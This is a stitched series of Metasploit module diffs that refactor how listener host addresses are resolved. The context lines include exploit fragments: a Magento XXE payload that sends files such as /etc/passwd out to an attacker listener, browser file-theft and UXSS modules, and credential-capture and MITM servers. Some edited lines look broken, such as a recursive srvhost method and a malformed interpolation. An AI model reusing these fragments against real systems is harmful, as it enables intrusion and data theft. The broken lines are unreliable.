-    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
-  end
-
   def custom_js
     rjs_hook + datastore['CUSTOM_JS']
   end

--- a/modules/auxiliary/gather/android_stock_browser_uxss.rb
+++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb
@@ -220,7 +220,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end

--- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
+++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
   #
   def run
     start_service
-    print_status("Local FTP: #{lookup_lhost}:#{datastore['SRVPORT']}")
+    print_status("Local FTP: #{Rex::Socket.to_authority(srvhost_addr, srvport)}")
     start_http
     @http_service.wait
   end
@@ -68,17 +68,12 @@ class MetasploitModule < Msf::Auxiliary
     # Ensture all dependencies are present before initializing HTTP
     use_zlib
 
-    comm = datastore['ListenerComm']
-    if comm.to_s == 'local'
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
+    comm = _determine_server_comm(bindhost)
 
     # Default the server host / port
     opts = {
-      'ServerHost' => srvhost,
-      'ServerPort' => datastore['HTTPPORT'],
+      'ServerHost' => bindhost,
+      'ServerPort' => datastore['HTTPPORT'], # can't use bindport because this wants HTTPPORT not SRVPORT
       'Comm' => comm
     }.update(opts)
 
@@ -111,24 +106,12 @@ class MetasploitModule < Msf::Auxiliary
     print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
 
     if opts['ServerHost'] == '0.0.0.0'
-      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
+      print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
     end
 
     # Add path to resource
     @service_path = uopts['Path']
     @http_service.add_resource(uopts['Path'], uopts)
-  end
-
-  #
-  # Lookup the right address for the client
-  #
-  def lookup_lhost(c = nil)
-    # Get the source address
-    if srvhost == '0.0.0.0'
-      Rex::Socket.source_address(c || '50.50.50.50')
-    else
-      srvhost
-    end
   end
 
   #
@@ -211,7 +194,7 @@ class MetasploitModule < Msf::Auxiliary
       domains = datastore['TARGET_DOMAINS'].split(',')
       iframes = domains.map do |domain|
         %Q|<iframe style='position:fixed;top:-99999px;left:-99999px;height:0;width:0;'
-                src='ftp://user%40#{lookup_lhost}%3A#{datastore['SRVPORT']}%2Findex.html%23@#{domain}/'>
+                src='ftp://user%40#{srvhost_addr}%3A#{srvport}%2Findex.html%23@#{domain}/'>
         </iframe>|
       end
 

--- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
+++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # Default the server host / port
     opts = {
-      'ServerHost' => datastore['SRVHOST'],
+      'ServerHost' => srvhost,
       'ServerPort' => datastore['HTTPPORT'],
       'Comm' => comm
     }.update(opts)
@@ -124,10 +124,10 @@ class MetasploitModule < Msf::Auxiliary
   #
   def lookup_lhost(c = nil)
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address(c || '50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 

--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -86,14 +86,6 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
-  # @return [String] formatted http/https URL of the listener
-  def backend_url
-    proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
-  end
-
   def message
     super + (datastore['INSTALL_EXTENSION'] ? " <a href='javascript:void(0)'>Click here to continue.</a>" + popup_js : '')
   end

--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
   # @return [String] formatted http/https URL of the listener
   def backend_url
     proto = (datastore["SSL"] ? "https" : "http")
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end

--- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
+++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore['SSL'] ? 'https' : 'http')
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
 

--- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
+++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
@@ -92,8 +92,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def backend_url
-    resource = get_resource.end_with?('/') ? get_resource[0, get_resource.length - 1] : get_resource
-    get_uri("#{resource}/catch")
+    "#{get_uri}/catch"
   end
 
   def file_payload

--- a/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
+++ b/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
@@ -92,12 +92,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def backend_url
-    proto = (datastore['SSL'] ? 'https' : 'http')
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
-
-    "#{proto}://#{my_host}#{port_str}#{resource}/catch"
+    resource = get_resource.end_with?('/') ? get_resource[0, get_resource.length - 1] : get_resource
+    get_uri("#{resource}/catch")
   end
 
   def file_payload

--- a/modules/auxiliary/gather/ie_sandbox_findfiles.rb
+++ b/modules/auxiliary/gather/ie_sandbox_findfiles.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def js
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
     %Q|function report() {
   if(window.location.protocol != 'file:') {
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def svg
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
     %Q|<!-- saved from url=(0014)about:internet -->
 <svg width="100px" height="100px" version="1.1" onload="try{ location.href = 'file://#{my_host}/#{datastore['SHARENAME']}/index.html'; } catch(e) { }" xmlns="http://www.w3.org/2000/svg"></svg>|
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def on_request_uri(cli, request)
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
 
     case request.method
     when 'OPTIONS'
@@ -206,7 +206,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/

--- a/modules/auxiliary/gather/ie_sandbox_findfiles.rb
+++ b/modules/auxiliary/gather/ie_sandbox_findfiles.rb
@@ -51,12 +51,10 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def js
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-
     %Q|function report() {
   if(window.location.protocol != 'file:') {
     try {
-      window.location.href = 'file://#{my_host}/#{datastore['SHARENAME']}/index.html';
+      window.location.href = 'file://#{srvhost_addr}/#{datastore['SHARENAME']}/index.html';
     } catch (e) { }
     return;
   }
@@ -65,10 +63,10 @@ class MetasploitModule < Msf::Auxiliary
   for(var i = 0; i < frames.length; i++) {
   try {
       if(frames[i].name == 'notfound') {
-        frames[i].src = 'http://#{my_host}/notfound/?f=' + frames[i].src;
+        frames[i].src = 'http://#{srvhost_addr}/notfound/?f=' + frames[i].src;
       }
       else {
-        frames[i].src = 'http://#{my_host}/found/?f=' + frames[i].src;
+        frames[i].src = 'http://#{srvhost_addr}/found/?f=' + frames[i].src;
       }
     } catch(e) { }
   }
@@ -98,10 +96,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def svg
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-
     %Q|<!-- saved from url=(0014)about:internet -->
-<svg width="100px" height="100px" version="1.1" onload="try{ location.href = 'file://#{my_host}/#{datastore['SHARENAME']}/index.html'; } catch(e) { }" xmlns="http://www.w3.org/2000/svg"></svg>|
+<svg width="100px" height="100px" version="1.1" onload="try{ location.href = 'file://#{srvhost_addr}/#{datastore['SHARENAME']}/index.html'; } catch(e) { }" xmlns="http://www.w3.org/2000/svg"></svg>|
   end
 
   def is_target_suitable?(user_agent)
@@ -118,8 +114,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def on_request_uri(cli, request)
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-
     case request.method
     when 'OPTIONS'
       process_options(cli, request)
@@ -151,7 +145,7 @@ class MetasploitModule < Msf::Auxiliary
 <head>
 <script type="text/javascript">
   try {
-    window.location.href = 'file://#{my_host}/#{datastore['SHARENAME']}/index.html';
+    window.location.href = 'file://#{srvhost_addr}/#{datastore['SHARENAME']}/index.html';
   } catch (e) {
     blob = new Blob([atob('#{Rex::Text.encode_base64(svg)}')]);
     window.navigator.msSaveOrOpenBlob(blob, 'image.svg');
@@ -204,13 +198,8 @@ class MetasploitModule < Msf::Auxiliary
   def process_propfind(cli, request)
     path = request.uri
     print_status("PROPFIND #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
-
       if path.index(".")
         print_status "PROPFIND => 207 File (#{path})"
         body = %Q|<?xml version="1.0" encoding="utf-8"?>

--- a/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
+++ b/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections.']),
         OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
         OptString.new('TARGETFILE', [ true, 'The target file to read', '/etc/passwd']),
         OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false])
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary
     ent_file = Rex::Text.rand_text_alpha_lower(4..8)
     %(
       <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
-      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/?#{leak_param_name}=%#{ent_file};'>">
+      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{get_uri}/?#{leak_param_name}=%#{ent_file};'>">
     )
   end
 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Auxiliary
     xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
     xml += '['
     xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
-    xml += "    <!ENTITY % #{param_entity_name} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
+    xml += "    <!ENTITY % #{param_entity_name} SYSTEM '#{get_uri}/Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
     xml += ']'
     xml += "> <r>&#{ent_eval};</r>"
 

--- a/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
+++ b/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
@@ -39,6 +39,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
         OptString.new('TARGETFILE', [ true, 'The target file to read', '/etc/passwd']),
         OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false])
@@ -150,10 +151,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
-      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
-    end
-
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|

--- a/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
+++ b/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
@@ -39,7 +39,6 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections.']),
         OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
         OptString.new('TARGETFILE', [ true, 'The target file to read', '/etc/passwd']),
         OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false])

--- a/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
+++ b/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary
     ent_file = Rex::Text.rand_text_alpha_lower(4..8)
     %(
       <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
-      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/?#{leak_param_name}=%#{ent_file};'>">
+      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/?#{leak_param_name}=%#{ent_file};'>">
     )
   end
 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Auxiliary
     xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
     xml += '['
     xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
-    xml += "    <!ENTITY % #{param_entity_name} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
+    xml += "    <!ENTITY % #{param_entity_name} SYSTEM 'http://#{srvhost}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
     xml += ']'
     xml += "> <r>&#{ent_eval};</r>"
 

--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -46,15 +46,6 @@ class MetasploitModule < Msf::Auxiliary
     ])
   end
 
-  def lookup_lhost(c = nil)
-    # Get the source address
-    if srvhost == '0.0.0.0'
-      Rex::Socket.source_address(c || '50.50.50.50')
-    else
-      srvhost
-    end
-  end
-
   def on_request_uri(cli, req)
     if req.method =~ /post/i
       data_str = req.body.to_s
@@ -97,7 +88,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def ftp_url
-    "ftp://#{ftp_user}:#{ftp_pass}@#{lookup_lhost}:#{datastore['SRVPORT']}"
+    "ftp://#{ftp_user}:#{ftp_pass}@#{srvhost_addr}:#{datastore['SRVPORT']}"
   end
 
   def popup_html
@@ -124,7 +115,7 @@ class MetasploitModule < Msf::Auxiliary
         function() {
           history.pushState.call(
             opener.history, {}, {},
-            'file:///Volumes/#{lookup_lhost}/#{payload_name}'
+            'file:///Volumes/#{srvhost_addr}/#{payload_name}'
           );
         },
         function() { opener.location = 'about:blank'; },
@@ -222,16 +213,11 @@ class MetasploitModule < Msf::Auxiliary
     # Ensture all dependencies are present before initializing HTTP
     use_zlib
 
-    comm = datastore['ListenerComm']
-    if (comm.to_s == "local")
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
+    comm = _determin_server_comm(bindhost)
 
     # Default the server host / port
     opts = {
-      'ServerHost' => srvhost,
+      'ServerHost' => bindhost,
       'ServerPort' => datastore['HTTPPORT'],
       'Comm' => comm
     }.update(opts)

--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -48,10 +48,10 @@ class MetasploitModule < Msf::Auxiliary
 
   def lookup_lhost(c = nil)
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address(c || '50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 
@@ -231,7 +231,7 @@ class MetasploitModule < Msf::Auxiliary
 
     # Default the server host / port
     opts = {
-      'ServerHost' => datastore['SRVHOST'],
+      'ServerHost' => srvhost,
       'ServerPort' => datastore['HTTPPORT'],
       'Comm' => comm
     }.update(opts)

--- a/modules/auxiliary/server/android_mercury_parseuri.rb
+++ b/modules/auxiliary/server/android_mercury_parseuri.rb
@@ -71,12 +71,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def backend_url
-    proto = (datastore['SSL'] ? 'https' : 'http')
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
-
-    "#{proto}://#{my_host}#{port_str}#{resource}/catch"
+    resource = get_resource.end_with?('/') ? get_resource[0, get_resource.length - 1] : get_resource
+    get_uri("#{resource}/catch")
   end
 
   def uxss

--- a/modules/auxiliary/server/android_mercury_parseuri.rb
+++ b/modules/auxiliary/server/android_mercury_parseuri.rb
@@ -71,8 +71,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def backend_url
-    resource = get_resource.end_with?('/') ? get_resource[0, get_resource.length - 1] : get_resource
-    get_uri("#{resource}/catch")
+    "#{get_uri}/catch"
   end
 
   def uxss

--- a/modules/auxiliary/server/android_mercury_parseuri.rb
+++ b/modules/auxiliary/server/android_mercury_parseuri.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def backend_url
     proto = (datastore['SSL'] ? 'https' : 'http')
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
     resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
 

--- a/modules/auxiliary/server/browser_autopwn.rb
+++ b/modules/auxiliary/server/browser_autopwn.rb
@@ -365,7 +365,7 @@ class MetasploitModule < Msf::Auxiliary
     @payloads[lport] = payload
 
     print_status("Starting exploit #{name} with payload #{payload}")
-    @exploits[name].datastore['SRVHOST'] = datastore['SRVHOST']
+    @exploits[name].datastore['SRVHOST'] = srvhost
     @exploits[name].datastore['SRVPORT'] = datastore['SRVPORT']
 
     # For testing, set the exploit uri to the name of the exploit so it's

--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Auxiliary
     @formsdir = datastore['FORMSDIR']
     @template = datastore['TEMPLATE']
     @sitelist = datastore['SITELIST']
-    @myhost = datastore['SRVHOST']
+    @myhost = srvhost
     @myport = datastore['SRVPORT']
 
     @myautopwn_host = datastore['AUTOPWN_HOST']

--- a/modules/auxiliary/server/capture/http_basic.rb
+++ b/modules/auxiliary/server/capture/http_basic.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    @myhost = datastore['SRVHOST']
+    @myhost = srvhost
     @myport = datastore['SRVPORT']
     @realm = datastore['REALM']
 

--- a/modules/auxiliary/server/capture/pop3.rb
+++ b/modules/auxiliary/server/capture/pop3.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    @myhost = datastore['SRVHOST']
+    @myhost = srvhost
     @myport = datastore['SRVPORT']
     exploit
   end

--- a/modules/auxiliary/server/capture/printjob_capture.rb
+++ b/modules/auxiliary/server/capture/printjob_capture.rb
@@ -55,8 +55,6 @@ class MetasploitModule < Msf::Auxiliary
     @state = {}
 
     begin
-      @srvhost = srvhost
-      @srvport = datastore['SRVPORT'] || 9100
       @mode = datastore['MODE'].upcase || 'RAW'
       if datastore['FORWARD']
         @forward = datastore['FORWARD']
@@ -71,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
         fail_with(Failure::BadConfig, 'Cannot intercept LPR/IPP without a forwarding target')
       end
       @metadata = datastore['METADATA']
-      print_status("Starting Print Server on #{@srvhost}:#{@srvport} - #{@mode} mode")
+      print_status("Starting Print Server on #{Rex::Socket.to_authority(bindhost, bindport)} - #{@mode} mode")
 
       exploit
     rescue StandardError => e

--- a/modules/auxiliary/server/capture/printjob_capture.rb
+++ b/modules/auxiliary/server/capture/printjob_capture.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Auxiliary
     @state = {}
 
     begin
-      @srvhost = datastore['SRVHOST']
+      @srvhost = srvhost
       @srvport = datastore['SRVPORT'] || 9100
       @mode = datastore['MODE'].upcase || 'RAW'
       if datastore['FORWARD']

--- a/modules/auxiliary/server/capture/sip.rb
+++ b/modules/auxiliary/server/capture/sip.rb
@@ -139,12 +139,12 @@ class MetasploitModule < Msf::Auxiliary
   def run
     @port = datastore['SRVPORT'].to_i
     @sock = Rex::Socket::Udp.create(
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'LocalPort' => @port,
       'Context' => { 'Msf' => framework, 'MsfExploit' => self }
     )
     @run = true
-    server_ip = sip_sanitize_address(datastore['SRVHOST'])
+    server_ip = sip_sanitize_address(srvhost)
 
     while @run
       res = @sock.recvfrom

--- a/modules/auxiliary/server/capture/smtp.rb
+++ b/modules/auxiliary/server/capture/smtp.rb
@@ -241,7 +241,7 @@ class MetasploitModule < Msf::Auxiliary
         return
       elsif arg == 'CRAM-MD5'
         # create and send challenge
-        challenge = "<#{Rex::Text.rand_text_numeric(9..12)}@#{datastore['SRVHOST']}>"
+        challenge = "<#{Rex::Text.rand_text_numeric(9..12)}@#{srvhost}>"
         client.put "334 #{Rex::Text.encode_base64(challenge)}\r\n"
         @state[client][:auth_cram] = true
         @state[client][:auth_cram_challenge] = challenge

--- a/modules/auxiliary/server/dns/spoofhelper.rb
+++ b/modules/auxiliary/server/dns/spoofhelper.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
 
     @sock = ::UDPSocket.new
     @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
-    @sock.bind(datastore['SRVHOST'], @port)
+    @sock.bind(srvhost, @port)
     @run = true
 
     while @run

--- a/modules/auxiliary/server/fakedns.rb
+++ b/modules/auxiliary/server/fakedns.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status("DNS server initializing")
     @sock = ::UDPSocket.new()
     @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
-    @sock.bind(datastore['SRVHOST'], @port)
+    @sock.bind(srvhost, @port)
     @run = true
     @domain_target_list = datastore['TARGETDOMAIN'].split
     @bypass = (datastore['TARGETACTION'].upcase == "BYPASS")

--- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
+++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
     fake_host = datastore['FAKEHOST'] || datastore['HOST']
     fake_port = datastore['FAKEPORT'] || datastore['PORT']
     host = datastore['HOST']
-    local_host = datastore['SRVHOST']
+    local_host = srvhost
     local_port = datastore['SRVPORT']
     port = datastore['PORT']
 

--- a/modules/auxiliary/server/netbios_spoof_nat.rb
+++ b/modules/auxiliary/server/netbios_spoof_nat.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
 
     @sock = ::UDPSocket.new()
     @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
-    @sock.bind(datastore['SRVHOST'], @port)
+    @sock.bind(srvhost, @port)
 
     @targ_rate = datastore['PPSRATE']
     @fake_name = datastore['NBNAME']

--- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
+++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Auxiliary
   def run
     host = datastore['HOST']
     port = datastore['PORT']
-    local_host = datastore['SRVHOST']
+    local_host = srvhost
     local_port = datastore['SRVPORT']
 
     root_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA')

--- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
+++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
 
   # Setup the server module and start handling requests
   def run
-    print_status("Listening on #{srvhost}:#{datastore['SRVPORT']}...")
+    print_status("Listening on #{Rex::Socket.to_authority(bindhost, bindport)}...")
     exploit
   end
 

--- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
+++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
 
   # Setup the server module and start handling requests
   def run
-    print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+    print_status("Listening on #{srvhost}:#{datastore['SRVPORT']}...")
     exploit
   end
 

--- a/modules/auxiliary/server/tftp.rb
+++ b/modules/auxiliary/server/tftp.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def srvhost
-    datastore['SRVHOST'] || '0.0.0.0'
+    srvhost || '0.0.0.0'
   end
 
   def srvport

--- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
+++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])
       ]
     )
@@ -123,9 +123,9 @@ class MetasploitModule < Msf::Exploit::Remote
       <ns7744:login xmlns:ns7744="urn:NSConfig">
       <username xsi:type="xsd:string">nsroot</username>
       <password xsi:type="xsd:string">nsroot</password>
-      <clientip xsi:type="xsd:string">#{srvhost}</clientip>
+      <clientip xsi:type="xsd:string">#{srvhost_addr}</clientip>
       <cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
-      <ns xsi:type="xsd:string">#{srvhost}</ns>
+      <ns xsi:type="xsd:string">#{srvhost_addr}</ns>
       </ns7744:login>
       </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>

--- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
+++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
@@ -72,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
